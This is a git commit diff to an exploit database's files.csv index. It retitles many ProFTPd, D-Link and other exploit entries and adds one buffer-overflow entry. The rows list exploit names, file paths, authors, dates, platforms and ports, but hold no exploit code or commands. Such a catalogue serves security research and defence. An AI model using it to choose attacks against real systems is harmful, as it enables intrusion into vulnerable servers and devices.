DB: 2017-08-30
10 new exploits ProFTPd 1.2.0 (rc2) - memory leakage example Exploit ProFTPd 1.2.0pre10 - Remote Denial of Service ProFTPd 1.2.0 rc2 - Memory Leakage Exploit ProFTPd 1.2.0 pre10 - Remote Denial of Service ProFTPd 1.3.0a - (mod_ctrls support) Local Buffer Overflow (PoC) ProFTPd 1.3.0a - 'mod_ctrls support' Local Buffer Overflow (PoC) ProFTPd mod_sftp - Integer Overflow Denial of Service (PoC) ProFTPd - 'mod_sftp' Integer Overflow Denial of Service (PoC) ProFTPd 1.2 - SIZE Remote Denial of Service ProFTPd 1.2 - 'SIZE' Remote Denial of Service ProFTPd 1.2.x - STAT Command Denial of Service ProFTPd 1.2.x - 'STAT' Denial of Service ProFTPd - (ftpdctl) Local pr_ctrls_connect ProFTPd - 'ftpdctl' 'pr_ctrls_connect' Exploit ProFTPd 1.3.0/1.3.0a - (mod_ctrls support) Local Buffer Overflow (1) ProFTPd 1.3.0/1.3.0a - (mod_ctrls support) Local Buffer Overflow (2) ProFTPd 1.3.0/1.3.0a - 'mod_ctrls support' Local Buffer Overflow (1) ProFTPd 1.3.0/1.3.0a - 'mod_ctrls support' Local Buffer Overflow (2) ProFTPd 1.3.0/1.3.0a - (mod_ctrls) Local Overflow (exec-shield) ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' Local Overflow (exec-shield) ProFTPd 1.3.0 - mod_ctrls Local Stack Overflow (OpenSUSE) ProFTPd 1.3.0 (OpenSUSE) - 'mod_ctrls' Local Stack Overflow Easy Vedio to PSP Converter 1.6.20 - Buffer Overflow (SEH) ProFTPd 1.2.9RC1 - 'mod_sql' SQL Injection ProFTPd 1.2.9 RC1 - 'mod_sql' SQL Injection ProFTPd 1.3.0 - (sreplace) Remote Stack Overflow (Metasploit) ProFTPd 1.3.0 - 'sreplace' Remote Stack Overflow (Metasploit) ProFTPd 1.x (module mod_tls) - Remote Buffer Overflow ProFTPd 1.x - 'mod_tls module' Remote Buffer Overflow ProFTPd 1.3.2rc3 < 1.3.3b (Linux) - Telnet IAC Buffer Overflow (Metasploit) ProFTPd 1.2 < 1.3.0 (Linux) - sreplace Buffer Overflow (Metasploit) ProFTPd 1.3.2 rc3 < 1.3.3b (Linux) - Telnet IAC Buffer Overflow (Metasploit) ProFTPd 1.2 < 1.3.0 (Linux) - 'sreplace' Buffer Overflow (Metasploit) ProFTPd 1.3.2rc3 < 1.3.3b (FreeBSD) - Telnet IAC Buffer Overflow (Metasploit) ProFTPd 1.3.2 rc3 < 1.3.3b (FreeBSD) - Telnet IAC Buffer Overflow (Metasploit) FreeBSD ftpd and ProFTPd on FreeBSD - Remote Command Execution ftpd / ProFTPd (FreeBSD) - Remote Command Execution ProFTPd 1.2 pre6 - snprintf Exploit ProFTPd 1.2 pre6 - 'snprintf' Remote Root Exploit D-Link DIR-645 / DIR-815 - diagnostic.php Command Execution (Metasploit) D-Link DIR-645 / DIR-815 - 'diagnostic.php' Command Execution (Metasploit) D-Link DIR615h - OS Command Injection (Metasploit) D-Link DIR-615H - OS Command Injection (Metasploit) ProFTPd 1.3.5 - (mod_copy) Remote Command Execution ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution ProFTPd 1.3.5 - 'Mod_Copy' Command Execution (Metasploit) ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit) QNAP Transcode Server - Command Execution (Metasploit) D-Link DIR-600 / DIR-300 (rev B) - Multiple Vulnerabilities D-Link DIR-600 / DIR-300 (Rev B) - Multiple Vulnerabilities D-Link DIR-615 rev H - Multiple Vulnerabilities D-Link DIR-615 Rev H - Multiple Vulnerabilities D-Link DIR-615 Hardware rev D3 / DIR-300 Hardware rev A - Multiple Vulnerabilities D-Link DIR-615 Rev D3 / DIR-300 Rev A - Multiple Vulnerabilities D-Link DIR-615 Hardware vE4 Firmware 5.10 - Cross-Site Request Forgery D-Link DIR-615 vE4 Firmware 5.10 - Cross-Site Request Forgery D-Link DIR-600L Hardware Version AX Firmware 1.00 - Cross-Site Request Forgery D-Link DIR-600L AX 1.00 - Cross-Site Request Forgery NethServer 7.3.1611 - Cross-Site Request Forgery / Cross-Site Scripting NethServer 7.3.1611 - Cross-Site Request Forgery (Create User / Enable SSH Access) D-Link DIR-600 - Authentication Bypass Car or Cab Booking Script - Authentication Bypass PHP Appointment Booking Script - Authentication Bypass User Login and Management - Multiple Vulnerabilities PHP Video Battle Script 1.0 - SQL Injection Brickcom IP Camera - Credentials Disclosure
This commit is contained in:
parent
e3a111f58c
commit
13819fd065
12 changed files with 675 additions and 29 deletions
66
files.csv
66
files.csv
|
@ -34,8 +34,8 @@ id,file,description,date,author,platform,type,port
|
|||
236,platforms/linux/dos/236.sh,"RedHat 6.1/6.2 - TTY Flood Users Exploit",2001-01-02,teleh0r,linux,dos,0
|
||||
238,platforms/linux/dos/238.c,"ml2 - Local users can Crash processes",2001-01-03,Stealth,linux,dos,0
|
||||
240,platforms/solaris/dos/240.sh,"Solaris 2.6 / 7 / 8 - Lock Users Out of mailx Exploit",2001-01-03,Optyx,solaris,dos,0
|
||||
241,platforms/linux/dos/241.c,"ProFTPd 1.2.0 (rc2) - memory leakage example Exploit",2001-01-03,"Piotr Zurawski",linux,dos,21
|
||||
244,platforms/linux/dos/244.java,"ProFTPd 1.2.0pre10 - Remote Denial of Service",2001-01-12,JeT-Li,linux,dos,21
|
||||
241,platforms/linux/dos/241.c,"ProFTPd 1.2.0 rc2 - Memory Leakage Exploit",2001-01-03,"Piotr Zurawski",linux,dos,21
|
||||
244,platforms/linux/dos/244.java,"ProFTPd 1.2.0 pre10 - Remote Denial of Service",2001-01-12,JeT-Li,linux,dos,21
|
||||
251,platforms/linux/dos/251.c,"APC UPS 3.7.2 - 'apcupsd' Local Denial of Service",2001-01-15,"the itch",linux,dos,0
|
||||
262,platforms/hardware/dos/262.pl,"Cisco Multiple Products - Automated Exploit Tool",2001-01-27,hypoclear,hardware,dos,0
|
||||
264,platforms/novell/dos/264.c,"Novell BorderManager Enterprise Edition 3.5 - Denial of Service",2001-05-07,honoriak,novell,dos,0
|
||||
|
@ -436,7 +436,7 @@ id,file,description,date,author,platform,type,port
|
|||
2916,platforms/windows/dos/2916.php,"Golden FTP server 1.92 - (USER/PASS) Heap Overflow (PoC)",2006-12-11,rgod,windows,dos,0
|
||||
2922,platforms/windows/dos/2922.txt,"Microsoft Word Document - Malformed Pointer (PoC)",2006-12-12,DiscoJonny,windows,dos,0
|
||||
2926,platforms/windows/dos/2926.py,"Crob FTP Server 3.6.1 build 263 - (LIST/NLST) Denial of Service",2006-12-13,shinnai,windows,dos,0
|
||||
2928,platforms/linux/dos/2928.py,"ProFTPd 1.3.0a - (mod_ctrls support) Local Buffer Overflow (PoC)",2006-12-13,"Core Security",linux,dos,0
|
||||
2928,platforms/linux/dos/2928.py,"ProFTPd 1.3.0a - 'mod_ctrls support' Local Buffer Overflow (PoC)",2006-12-13,"Core Security",linux,dos,0
|
||||
2929,platforms/windows/dos/2929.cpp,"Microsoft Internet Explorer 7 - (DLL-load Hijacking) Code Execution (PoC)",2006-12-14,"Aviv Raff",windows,dos,0
|
||||
2934,platforms/windows/dos/2934.php,"Sambar FTP Server 6.4 - (SIZE) Remote Denial of Service",2006-12-15,rgod,windows,dos,0
|
||||
2935,platforms/windows/dos/2935.sh,"Microsoft Windows Media Player 9/10 - '.mid' Denial of Service",2006-12-15,sehato,windows,dos,0
|
||||
|
@ -1885,7 +1885,7 @@ id,file,description,date,author,platform,type,port
|
|||
16108,platforms/multiple/dos/16108.txt,"VideoLAN VLC Media Player 1.1 - Subtitle 'StripTags()' Function Memory Corruption",2011-02-03,"Harry Sintonen",multiple,dos,0
|
||||
16120,platforms/windows/dos/16120.py,"Hanso Player 1.4.0.0 - Buffer Overflow Skinfile (Denial of Service)",2011-02-06,badc0re,windows,dos,0
|
||||
16121,platforms/windows/dos/16121.py,"Hanso Converter 1.1.0 - BufferOverflow Denial of Service",2011-02-06,badc0re,windows,dos,0
|
||||
16129,platforms/linux/dos/16129.txt,"ProFTPd mod_sftp - Integer Overflow Denial of Service (PoC)",2011-02-07,kingcope,linux,dos,0
|
||||
16129,platforms/linux/dos/16129.txt,"ProFTPd - 'mod_sftp' Integer Overflow Denial of Service (PoC)",2011-02-07,kingcope,linux,dos,0
|
||||
16166,platforms/windows/dos/16166.py,"Microsoft Windows Server 2003 - AD Unauthenticated BROWSER ELECTION Remote Heap Overflow",2011-02-14,Cupidon-3005,windows,dos,0
|
||||
16150,platforms/windows/dos/16150.py,"XM Easy Personal FTP Server 5.8.0 - 'TYPE' Denial of Service",2011-02-10,"Houssam Sahli",windows,dos,0
|
||||
16180,platforms/windows/dos/16180.py,"BWMeter 5.4.0 - '.csv' Denial of Service",2011-02-17,b0telh0,windows,dos,0
|
||||
|
@ -2480,7 +2480,7 @@ id,file,description,date,author,platform,type,port
|
|||
20532,platforms/sco/dos/20532.txt,"ScreenOS 1.73/2.x - Firewall Denial of Service",2001-01-08,Nsfocus,sco,dos,0
|
||||
20534,platforms/multiple/dos/20534.txt,"WebMaster ConferenceRoom 1.8 Developer Edition - Denial of Service",2001-01-10,"Murat - 2",multiple,dos,0
|
||||
20535,platforms/linux/dos/20535.txt,"(Linux Kernel) ReiserFS 3.5.28 - Potential Code Execution / Denial of Service",2001-01-09,"Marc Lehmann",linux,dos,0
|
||||
20536,platforms/linux/dos/20536.java,"ProFTPd 1.2 - SIZE Remote Denial of Service",2000-12-20,JeT-Li,linux,dos,0
|
||||
20536,platforms/linux/dos/20536.java,"ProFTPd 1.2 - 'SIZE' Remote Denial of Service",2000-12-20,JeT-Li,linux,dos,0
|
||||
20705,platforms/multiple/dos/20705.py,"SAP NetWeaver Dispatcher 7.0 ehp1/2 - Multiple Vulnerabilities",2012-08-21,"Core Security",multiple,dos,0
|
||||
20552,platforms/windows/dos/20552.html,"Microsoft Internet Explorer 4 / Outlook 2000/5.5 - 'MSHTML.dll' Crash",2001-01-15,"Thor Larholm",windows,dos,0
|
||||
20558,platforms/multiple/dos/20558.txt,"Apache 1.2 - Denial of Service",1997-12-30,"Michal Zalewski",multiple,dos,0
|
||||
|
@ -2744,7 +2744,7 @@ id,file,description,date,author,platform,type,port
|
|||
22062,platforms/hardware/dos/22062.py,"Linksys Devices 1.42/1.43 - GET Request Buffer Overflow",2002-12-03,"Core Security",hardware,dos,0
|
||||
22068,platforms/unix/dos/22068.pl,"Apache 1.3.x + Tomcat 4.0.x/4.1.x (Mod_JK) - Chunked Encoding Denial of Service",2002-12-04,Sapient2003,unix,dos,0
|
||||
22074,platforms/osx/dos/22074.txt,"Apple Mac OSX 10.2.2 - Directory Kernel Panic Denial of Service",2002-11-07,shibby,osx,dos,0
|
||||
22079,platforms/linux/dos/22079.sh,"ProFTPd 1.2.x - STAT Command Denial of Service",2002-12-09,"Rob klein Gunnewiek",linux,dos,0
|
||||
22079,platforms/linux/dos/22079.sh,"ProFTPd 1.2.x - 'STAT' Denial of Service",2002-12-09,"Rob klein Gunnewiek",linux,dos,0
|
||||
22081,platforms/windows/dos/22081.pl,"Mollensoft Software Enceladus Server Suite 3.9 - FTP Command Buffer Overflow",2002-12-09,"Tamer Sahin",windows,dos,0
|
||||
22100,platforms/windows/dos/22100.txt,"Microsoft Internet Explorer 9 - Cross-Site Scripting Filter Bypass",2012-10-19,"Jean Pascal Pereira",windows,dos,0
|
||||
22105,platforms/linux/dos/22105.c,"Linux Kernel 2.2 - 'mmap()' Local Denial of Service",2002-12-17,"Michal Zalewski",linux,dos,0
|
||||
|
@ -5781,7 +5781,7 @@ id,file,description,date,author,platform,type,port
|
|||
381,platforms/windows/local/381.c,"RhinoSoft Serv-U FTP Server 3.x < 5.x - Privilege Escalation",2004-08-08,"Andrés Acunha",windows,local,0
|
||||
388,platforms/windows/local/388.c,"OllyDbg 1.10 - Format String",2004-08-10,"Ahmet Cihan",windows,local,0
|
||||
393,platforms/linux/local/393.c,"LibPNG 1.2.5 - 'png_jmpbuf()' Local Buffer Overflow",2004-08-13,anonymous,linux,local,0
|
||||
394,platforms/linux/local/394.c,"ProFTPd - (ftpdctl) Local pr_ctrls_connect",2004-08-13,pi3,linux,local,0
|
||||
394,platforms/linux/local/394.c,"ProFTPd - 'ftpdctl' 'pr_ctrls_connect' Exploit",2004-08-13,pi3,linux,local,0
|
||||
395,platforms/windows/local/395.c,"AOL Instant Messenger AIM - 'Away' Message Local Exploit",2004-08-14,mandragore,windows,local,0
|
||||
396,platforms/bsd/local/396.c,"OpenBSD ftp - Exploit",2002-01-01,Teso,bsd,local,0
|
||||
401,platforms/windows/local/401.c,"IPSwitch IMail Server 8.1 - Local Password Decryption Utility",2004-08-18,Adik,windows,local,0
|
||||
|
@ -6066,8 +6066,8 @@ id,file,description,date,author,platform,type,port
|
|||
3220,platforms/windows/local/3220.c,"Multiple Printer Providers (spooler service) - Privilege Escalation",2007-01-29,"Andres Tarasco",windows,local,0
|
||||
3260,platforms/windows/local/3260.txt,"Microsoft Word 2000 - Unspecified Code Execution",2007-02-03,xCuter,windows,local,0
|
||||
3273,platforms/tru64/local/3273.ksh,"HP Tru64 Alpha OSF1 5.1 - (ps) Information Leak Exploit",2007-02-06,bunker,tru64,local,0
|
||||
3330,platforms/linux/local/3330.pl,"ProFTPd 1.3.0/1.3.0a - (mod_ctrls support) Local Buffer Overflow (1)",2007-02-18,Revenge,linux,local,0
|
||||
3333,platforms/linux/local/3333.pl,"ProFTPd 1.3.0/1.3.0a - (mod_ctrls support) Local Buffer Overflow (2)",2007-02-19,Revenge,linux,local,0
|
||||
3330,platforms/linux/local/3330.pl,"ProFTPd 1.3.0/1.3.0a - 'mod_ctrls support' Local Buffer Overflow (1)",2007-02-18,Revenge,linux,local,0
|
||||
3333,platforms/linux/local/3333.pl,"ProFTPd 1.3.0/1.3.0a - 'mod_ctrls support' Local Buffer Overflow (2)",2007-02-19,Revenge,linux,local,0
|
||||
3342,platforms/windows/local/3342.c,"News Rover 12.1 Rev 1 - Remote Stack Overflow (1)",2007-02-20,Marsu,windows,local,0
|
||||
3349,platforms/windows/local/3349.c,"News Bin Pro 5.33 - '.nbi' Local Buffer Overflow",2007-02-21,Marsu,windows,local,0
|
||||
3356,platforms/linux/local/3356.sh,"Nortel SSL VPN Linux Client 6.0.3 - Privilege Escalation",2007-02-21,"Jon Hart",linux,local,0
|
||||
|
@ -6113,7 +6113,7 @@ id,file,description,date,author,platform,type,port
|
|||
3692,platforms/windows/local/3692.c,"IrfanView 3.99 - '.ani' Local Buffer Overflow (2)",2007-04-09,"Breno Silva Pinto",windows,local,0
|
||||
3695,platforms/windows/local/3695.c,"Microsoft Windows - Animated Cursor '.ani' Local Overflow",2007-04-09,"Breno Silva Pinto",windows,local,0
|
||||
3727,platforms/windows/local/3727.c,"VCDGear 3.56 Build 050213 - (FILE) Local Code Execution",2007-04-13,InTeL,windows,local,0
|
||||
3730,platforms/linux/local/3730.txt,"ProFTPd 1.3.0/1.3.0a - (mod_ctrls) Local Overflow (exec-shield)",2007-04-13,Xpl017Elz,linux,local,0
|
||||
3730,platforms/linux/local/3730.txt,"ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' Local Overflow (exec-shield)",2007-04-13,Xpl017Elz,linux,local,0
|
||||
3755,platforms/windows/local/3755.c,"Microsoft Windows - GDI Privilege Escalation (MS07-017) (2)",2007-04-17,"Lionel d'Hauenens",windows,local,0
|
||||
3757,platforms/windows/local/3757.txt,"OllyDbg 1.10 - Local Format String",2007-04-17,jamikazu,windows,local,0
|
||||
3772,platforms/windows/local/3772.c,"PhotoFiltre Studio 8.1.1 - '.tif' Local Buffer Overflow",2007-04-21,Marsu,windows,local,0
|
||||
|
@ -6577,7 +6577,7 @@ id,file,description,date,author,platform,type,port
|
|||
10018,platforms/linux/local/10018.sh,"Linux Kernel 2.6.32 - 'pipe.c' Privilege Escalation (4)",2009-11-12,"Earl Chew",linux,local,0
|
||||
10038,platforms/linux/local/10038.txt,"proc File - Descriptors Directory Permissions Bypass",2009-10-23,"Pavel Machek",linux,local,0
|
||||
10039,platforms/windows/local/10039.txt,"GPG4Win GNU - Privacy Assistant (PoC)",2009-10-23,Dr_IDE,windows,local,0
|
||||
10044,platforms/unix/local/10044.pl,"ProFTPd 1.3.0 - mod_ctrls Local Stack Overflow (OpenSUSE)",2009-10-12,"Michael Domberg",unix,local,0
|
||||
10044,platforms/unix/local/10044.pl,"ProFTPd 1.3.0 (OpenSUSE) - 'mod_ctrls' Local Stack Overflow",2009-10-12,"Michael Domberg",unix,local,0
|
||||
10060,platforms/linux/local/10060.sh,"Geany .18 - Local File Overwrite",2009-10-06,"Jeremy Brown",linux,local,0
|
||||
10072,platforms/multiple/local/10072.c,"Multiple Vendor - TLS Protocol Session Renegotiation Security",2009-11-12,"Marsh Ray",multiple,local,0
|
||||
10076,platforms/osx/local/10076.c,"VMware Fusion 2.0.5 - vmx86 kext Kernel Privilege Escalation",2009-10-02,mu-b,osx,local,0
|
||||
|
@ -9220,6 +9220,7 @@ id,file,description,date,author,platform,type,port
|
|||
42565,platforms/windows/local/42565.py,"Easy DVD Creator 2.5.11 - Buffer Overflow (SEH)",2017-08-26,tr0ubl3m4k3r,windows,local,0
|
||||
42567,platforms/windows/local/42567.py,"Easy WMV/ASF/ASX to DVD Burner 2.3.11 - Buffer Overflow (SEH)",2017-08-28,"Touhid M.Shaikh",windows,local,0
|
||||
42568,platforms/windows/local/42568.py,"Easy RM RMVB to DVD Burner 1.8.11 - Buffer Overflow (SEH)",2017-08-28,"Touhid M.Shaikh",windows,local,0
|
||||
42586,platforms/windows/local/42586.py,"Easy Vedio to PSP Converter 1.6.20 - Buffer Overflow (SEH)",2017-08-28,"Kishan Sharma",windows,local,0
|
||||
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
|
||||
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
|
||||
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
|
||||
|
@ -9245,7 +9246,7 @@ id,file,description,date,author,platform,type,port
|
|||
39,platforms/linux/remote/39.c,"Atftpd 0.6 - 'atftpdx.c' Remote Command Execution",2003-06-10,gunzip,linux,remote,69
|
||||
41,platforms/linux/remote/41.pl,"mnoGoSearch 3.1.20 - Remote Command Execution",2003-06-10,pokleyzz,linux,remote,80
|
||||
42,platforms/windows/remote/42.c,"Winmail Mail Server 2.3 - Remote Format String",2003-06-11,ThreaT,windows,remote,25
|
||||
43,platforms/linux/remote/43.pl,"ProFTPd 1.2.9RC1 - 'mod_sql' SQL Injection",2003-06-19,Spaine,linux,remote,21
|
||||
43,platforms/linux/remote/43.pl,"ProFTPd 1.2.9 RC1 - 'mod_sql' SQL Injection",2003-06-19,Spaine,linux,remote,21
|
||||
45,platforms/windows/remote/45.c,"Yahoo Messenger 5.5 - 'DSR-ducky.c' Remote Exploit",2003-06-23,Rave,windows,remote,80
|
||||
46,platforms/linux/remote/46.c,"Kerio MailServer 5.6.3 - Remote Buffer Overflow",2003-06-27,B-r00t,linux,remote,25
|
||||
48,platforms/windows/remote/48.c,"Microsoft Windows Media Services - Remote Exploit (MS03-022)",2003-07-01,firew0rker,windows,remote,80
|
||||
|
@ -9766,7 +9767,7 @@ id,file,description,date,author,platform,type,port
|
|||
2809,platforms/windows/remote/2809.py,"Microsoft Windows - NetpManageIPCConnect - Stack Overflow (MS06-070) (Python)",2006-11-18,"Winny Thomas",windows,remote,445
|
||||
2821,platforms/windows/remote/2821.c,"XMPlay 3.3.0.4 - '.PLS' Local/Remote Buffer Overflow",2006-11-21,"Greg Linares",windows,remote,0
|
||||
2837,platforms/multiple/remote/2837.sql,"Oracle 9i/10g - (read/write/execute) Exploitation Suite",2006-11-23,"Marco Ivaldi",multiple,remote,0
|
||||
2856,platforms/linux/remote/2856.pm,"ProFTPd 1.3.0 - (sreplace) Remote Stack Overflow (Metasploit)",2006-11-27,"Evgeny Legerov",linux,remote,21
|
||||
2856,platforms/linux/remote/2856.pm,"ProFTPd 1.3.0 - 'sreplace' Remote Stack Overflow (Metasploit)",2006-11-27,"Evgeny Legerov",linux,remote,21
|
||||
2858,platforms/linux/remote/2858.c,"Evince Document Viewer - (DocumentMedia) Buffer Overflow",2006-11-28,K-sPecial,linux,remote,0
|
||||
2865,platforms/windows/remote/2865.rb,"3Com TFTP Service (3CTftpSvc) 2.0.1 - 'Long Transporting Mode' Overflow",2006-11-30,cthulhu,windows,remote,69
|
||||
2866,platforms/windows/remote/2866.html,"Acer LunchApp.APlunch - (ActiveX Control) Command Execution",2006-11-30,"Tan Chew Keong",windows,remote,0
|
||||
|
@ -9992,7 +9993,7 @@ id,file,description,date,author,platform,type,port
|
|||
4292,platforms/windows/remote/4292.cpp,"Diskeeper 9 - Remote Memory Disclosure",2007-08-17,Pravus,windows,remote,0
|
||||
4299,platforms/windows/remote/4299.html,"eCentrex VOIP Client module - 'uacomx.ocx 2.0.1' Remote Buffer Overflow",2007-08-21,rgod,windows,remote,0
|
||||
4301,platforms/windows/remote/4301.cpp,"Mercury/32 Mail SMTPD 4.51 - SMTPD CRAM-MD5 Unauthenticated Remote Overflow",2007-08-22,ZhenHan.Liu,windows,remote,25
|
||||
4312,platforms/linux/remote/4312.c,"ProFTPd 1.x (module mod_tls) - Remote Buffer Overflow",2007-08-24,netris,linux,remote,21
|
||||
4312,platforms/linux/remote/4312.c,"ProFTPd 1.x - 'mod_tls module' Remote Buffer Overflow",2007-08-24,netris,linux,remote,21
|
||||
4315,platforms/linux/remote/4315.py,"SIDVault LDAP Server - Unauthenticated Remote Buffer Overflow",2007-08-25,"Joxean Koret",linux,remote,389
|
||||
4316,platforms/windows/remote/4316.cpp,"Mercury/32 Mail Server 3.32 < 4.51 - SMTP Unauthenticated EIP Overwrite",2007-08-26,Heretic2,windows,remote,25
|
||||
4321,platforms/linux/remote/4321.rb,"BitchX 1.1 Final - MODE Remote Heap Overflow",2007-08-27,bannedit,linux,remote,0
|
||||
|
@ -11413,8 +11414,8 @@ id,file,description,date,author,platform,type,port
|
|||
16848,platforms/linux/remote/16848.rb,"Unreal Tournament 2004 (Linux) - 'secure' Overflow (Metasploit)",2010-09-20,Metasploit,linux,remote,0
|
||||
16849,platforms/linux/remote/16849.rb,"MySQL yaSSL (Linux) - SSL Hello Message Buffer Overflow (Metasploit)",2010-05-09,Metasploit,linux,remote,0
|
||||
16850,platforms/linux/remote/16850.rb,"MySQL - yaSSL CertDecoder::GetName Buffer Overflow (Metasploit)",2010-04-30,Metasploit,linux,remote,0
|
||||
16851,platforms/linux/remote/16851.rb,"ProFTPd 1.3.2rc3 < 1.3.3b (Linux) - Telnet IAC Buffer Overflow (Metasploit)",2011-01-09,Metasploit,linux,remote,0
|
||||
16852,platforms/linux/remote/16852.rb,"ProFTPd 1.2 < 1.3.0 (Linux) - sreplace Buffer Overflow (Metasploit)",2011-01-09,Metasploit,linux,remote,0
|
||||
16851,platforms/linux/remote/16851.rb,"ProFTPd 1.3.2 rc3 < 1.3.3b (Linux) - Telnet IAC Buffer Overflow (Metasploit)",2011-01-09,Metasploit,linux,remote,0
|
||||
16852,platforms/linux/remote/16852.rb,"ProFTPd 1.2 < 1.3.0 (Linux) - 'sreplace' Buffer Overflow (Metasploit)",2011-01-09,Metasploit,linux,remote,0
|
||||
16853,platforms/linux/remote/16853.rb,"Berlios GPSD - Format String (Metasploit)",2010-04-30,Metasploit,linux,remote,0
|
||||
16854,platforms/hardware/remote/16854.rb,"Linksys WRT54 (Access Point) - apply.cgi Buffer Overflow (Metasploit)",2010-09-24,Metasploit,hardware,remote,0
|
||||
16855,platforms/linux/remote/16855.rb,"PeerCast 0.1216 (Linux) - URL Handling Buffer Overflow (Metasploit)",2010-09-20,Metasploit,linux,remote,0
|
||||
|
@ -11436,7 +11437,7 @@ id,file,description,date,author,platform,type,port
|
|||
16874,platforms/osx/remote/16874.rb,"Apple Mac OSX EvoCam Web Server - HTTP GET Buffer Overflow (Metasploit)",2010-10-09,Metasploit,osx,remote,0
|
||||
16875,platforms/osx/remote/16875.rb,"Samba 3.0.10 (OSX) - 'lsa_io_trans_names' Heap Overflow (Metasploit)",2010-04-05,Metasploit,osx,remote,0
|
||||
16876,platforms/osx_ppc/remote/16876.rb,"Samba 2.2.8 (OSX/PPC) - 'trans2open' Overflow (Metasploit)",2010-06-21,Metasploit,osx_ppc,remote,0
|
||||
16878,platforms/linux/remote/16878.rb,"ProFTPd 1.3.2rc3 < 1.3.3b (FreeBSD) - Telnet IAC Buffer Overflow (Metasploit)",2010-12-02,Metasploit,linux,remote,0
|
||||
16878,platforms/linux/remote/16878.rb,"ProFTPd 1.3.2 rc3 < 1.3.3b (FreeBSD) - Telnet IAC Buffer Overflow (Metasploit)",2010-12-02,Metasploit,linux,remote,0
|
||||
16880,platforms/bsd_x86/remote/16880.rb,"Samba 2.2.8 (*BSD x86) - 'trans2open' Overflow Exploit (Metasploit)",2010-06-17,Metasploit,bsd_x86,remote,0
|
||||
16887,platforms/linux/remote/16887.rb,"HP OpenView Network Node Manager (OV NNM) - connectedNodes.ovpl Remote Command Execution (Metasploit)",2010-07-03,Metasploit,linux,remote,0
|
||||
16888,platforms/linux/remote/16888.rb,"SquirrelMail PGP Plugin - Command Execution (SMTP) (Metasploit)",2010-08-25,Metasploit,linux,remote,0
|
||||
|
@ -11631,7 +11632,7 @@ id,file,description,date,author,platform,type,port
|
|||
18171,platforms/multiple/remote/18171.rb,"Java Applet Rhino Script Engine - Remote Code Execution (Metasploit)",2011-11-30,Metasploit,multiple,remote,0
|
||||
18172,platforms/hardware/remote/18172.rb,"CTEK SkyRouter 4200/4300 - Command Execution (Metasploit)",2011-11-30,Metasploit,hardware,remote,0
|
||||
18179,platforms/jsp/remote/18179.html,"IBM Lotus Domino Server Controller - Authentication Bypass",2011-11-30,"Alexey Sintsov",jsp,remote,0
|
||||
18181,platforms/freebsd/remote/18181.txt,"FreeBSD ftpd and ProFTPd on FreeBSD - Remote Command Execution",2011-12-01,kingcope,freebsd,remote,0
|
||||
18181,platforms/freebsd/remote/18181.txt,"ftpd / ProFTPd (FreeBSD) - Remote Command Execution",2011-12-01,kingcope,freebsd,remote,0
|
||||
18182,platforms/windows/remote/18182.txt,"Serv-U FTP Server - Jail Break",2011-12-01,kingcope,windows,remote,0
|
||||
18183,platforms/windows/remote/18183.rb,"AVID Media Composer Phonetic Indexer - Remote Stack Buffer Overflow (Metasploit)",2011-12-01,"Nick Freeman",windows,remote,0
|
||||
18187,platforms/windows/remote/18187.c,"CoDeSys SCADA 2.3 - Remote Exploit",2011-12-01,"Celil Ünüver",windows,remote,0
|
||||
|
@ -11871,7 +11872,7 @@ id,file,description,date,author,platform,type,port
|
|||
19494,platforms/windows/remote/19494.c,"NetcPlus SmartServer 3.5.1 - SMTP Buffer Overflow",1999-09-13,UNYUN,windows,remote,0
|
||||
19495,platforms/windows/remote/19495.c,"Computalynx CMail 2.3 SP2/2.4 - SMTP Buffer Overflow",1999-09-13,UNYUN,windows,remote,0
|
||||
19496,platforms/windows/remote/19496.c,"FuseWare FuseMail 2.7 - POP Mail Buffer Overflow",1999-09-13,UNYUN,windows,remote,0
|
||||
19503,platforms/linux/remote/19503.txt,"ProFTPd 1.2 pre6 - snprintf Exploit",1999-09-17,"Tymm Twillman",linux,remote,0
|
||||
19503,platforms/linux/remote/19503.txt,"ProFTPd 1.2 pre6 - 'snprintf' Remote Root Exploit",1999-09-17,"Tymm Twillman",linux,remote,0
|
||||
19507,platforms/solaris/remote/19507.txt,"Solaris 7.0 - Recursive mutex_enter Panic",1999-09-23,"David Brumley",solaris,remote,0
|
||||
19514,platforms/windows/remote/19514.txt,"Adobe Acrobat ActiveX Control 1.3.188 - ActiveX Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0
|
||||
19515,platforms/windows/remote/19515.txt,"Microsoft Internet Explorer 4 (Windows 95/NT 4.0) - Setupctl ActiveX Control Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0
|
||||
|
@ -13619,7 +13620,7 @@ id,file,description,date,author,platform,type,port
|
|||
24945,platforms/hardware/remote/24945.rb,"Linksys WRT54GL - apply.cgi Command Execution (Metasploit)",2013-04-10,Metasploit,hardware,remote,0
|
||||
24946,platforms/multiple/remote/24946.rb,"Adobe ColdFusion APSB13-03 - Remote Exploit (Metasploit)",2013-04-10,Metasploit,multiple,remote,0
|
||||
24947,platforms/linux/remote/24947.txt,"MongoDB 2.2.3 - nativeHelper.apply Remote Code Execution",2013-04-08,agixid,linux,remote,0
|
||||
24956,platforms/hardware/remote/24956.rb,"D-Link DIR-645 / DIR-815 - diagnostic.php Command Execution (Metasploit)",2013-04-12,Metasploit,hardware,remote,0
|
||||
24956,platforms/hardware/remote/24956.rb,"D-Link DIR-645 / DIR-815 - 'diagnostic.php' Command Execution (Metasploit)",2013-04-12,Metasploit,hardware,remote,0
|
||||
24958,platforms/windows/remote/24958.py,"MinaliC WebServer 2.0.0 - Buffer Overflow",2013-04-15,superkojiman,windows,remote,0
|
||||
24961,platforms/windows/remote/24961.html,"FirePHP Firefox Plugin 0.7.1 - Remote Command Execution",2013-04-17,Wireghoul,windows,remote,0
|
||||
24963,platforms/multiple/remote/24963.rb,"SAP ConfigServlet - OS Command Execution (Metasploit)",2013-04-18,"Andras Kabai",multiple,remote,50000
|
||||
|
@ -13751,7 +13752,7 @@ id,file,description,date,author,platform,type,port
|
|||
